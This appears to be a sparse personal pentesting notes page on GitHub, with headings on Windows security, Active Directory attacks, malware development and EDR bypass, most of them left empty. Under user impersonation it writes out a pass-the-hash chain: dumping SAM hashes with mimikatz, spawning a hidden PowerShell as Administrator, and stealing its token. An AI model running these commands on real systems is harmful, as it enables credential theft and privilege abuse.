Skip to content

Latest commit

 

History

History
21 lines (14 loc) · 716 Bytes

File metadata and controls

21 lines (14 loc) · 716 Bytes

Windows Host security features

Security in AD network

Windows related

Process monitoring

Useful for trackig filesystem, Process, Threads, DLL activity

Active Directory and Windows Pentesting

User impersonation

  • PassTheHash - Dump NTLM hashes lsadump::sam, now Impersonate a user mimikatz sekurlsa::pth /user:Administrator /domain:. /ntlm:… /run:"powershell -w hidden", now migrate to the new created process as the impersonated user steal_token 1234
  • PassTheTicket - ?????????????????????
  • OverPassTheHash -

Malware developement

  • Grey hat GoLang

EDR bypass